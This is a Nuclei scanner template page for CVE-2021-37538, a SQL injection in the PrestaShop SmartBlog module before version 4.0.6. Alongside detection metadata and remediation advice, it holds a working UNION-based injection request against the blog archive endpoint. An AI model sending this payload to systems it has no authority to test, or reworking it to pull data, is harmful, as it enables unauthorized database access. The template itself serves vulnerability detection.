Skip to content
Nuclei Templates

PrestaShop SmartBlog <4.0.6 - SQL Injection

ID: CVE-2021-37538

Severity: critical

Author: whoever

Tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft

Description

Section titled “Description”

PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.

YAML Source

Section titled “YAML Source”
id: CVE-2021-37538


info:
  name: PrestaShop SmartBlog <4.0.6 - SQL Injection
  author: whoever
  severity: critical
  description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.
  impact: |
    An attacker can gain unauthorized access to the database, extract sensitive information, modify data, or perform other malicious activities.
  remediation: |
    Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability.
  reference:
    - https://blog.sorcery.ie/posts/smartblog_sqli/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37538
    - https://classydevs.com/free-modules/smartblog/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-37538
    cwe-id: CWE-89
    epss-score: 0.01766
    epss-percentile: 0.87981
    cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 1
    vendor: smartdatasoft
    product: smartblog
    framework: prestashop
  tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft


http:
  - method: GET
    path:
      - "{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c5fe25896e49ddfe996db7508cf00534"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502203aac24d9b2b974c518bc4ae7c5d098ff1bbe99525b8a77855ce0719480d80d1e022100932b5a87f554f34151fd6ca32079922349de68bd1018bc12bc17d96fedd1aa59:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-37538.yaml"

View on Github